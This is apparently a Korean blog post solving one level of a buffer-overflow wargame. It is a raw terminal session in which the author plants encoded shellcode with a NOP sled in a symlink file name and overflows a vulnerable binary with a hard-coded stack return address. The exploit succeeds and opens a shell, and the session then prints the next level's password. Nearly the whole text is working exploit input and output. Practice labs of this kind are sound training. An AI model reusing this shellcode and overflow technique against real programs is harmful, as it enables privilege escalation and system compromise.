[orge@localhost tmp]$ rm -rf ./*
[orge@localhost tmp]$ ln -s ../asdf/a.out `python -c 'print "\x90"*1000 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
ln: �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������^1ɱ2�l���u�������2�Qi00tii0cjo��QT�⚱
: File name too long
[orge@localhost tmp]$ ln -s ../asdf/a.out `python -c 'print "\x90"*500 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
ln: ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������^1ɱ2�l���u�������2�Qi00tii0cjo��QT�⚱
: File name too long
[orge@localhost tmp]$ ln -s ../asdf/a.out `python -c 'print "\x90"*200 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost tmp]$ ls
[orge@localhost tmp]$ ./���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������^Q^1ɱ2�l^N�^A��^Au��^E�����2�Qi00tii0cjo��QT�⚱^L asdf
0xbffff978
stack is still your friend.
[orge@localhost tmp]$ ./���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������^Q^1ɱ2�l^N�^A��^Au��^E�����2�Qi00tii0cjo��QT�⚱^L `python -c 'print "\x90"*44 + "\x78\xf9\xff\xbf"'`
0xbffff94c
��������������������������������������������x���
bash$ exit
exit
[orge@localhost tmp]$ rm -rf ./���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������^Q^1ɱ2�l^N�^A��^Au��^E�����2�Qi00tii0cjo��QT�⚱^L
[orge@localhost tmp]$ ln -s ../troll `python -c 'print "\x90"*200 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost tmp]$ ./���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������^Q^1ɱ2�l^N�^A��^Au��^E�����2�Qi00tii0cjo��QT�⚱^L `python -c 'print "\x90"*44 + "\x78\xf9\xff\xbf"'`
��������������������������������������������x���
bash$ my-pass
euid = 508
aspirin
bash$
'Wargame > LOB(끝)' 카테고리의 다른 글
| troll -> vampire (0) | 2015.02.02 |
|---|---|
| gdb 특정 값찾기 (0) | 2015.02.02 |
| darkelf -> orge (0) | 2015.01.29 |
| wolfman -> darkelf (0) | 2015.01.29 |
| orc -> wolfman (0) | 2015.01.28 |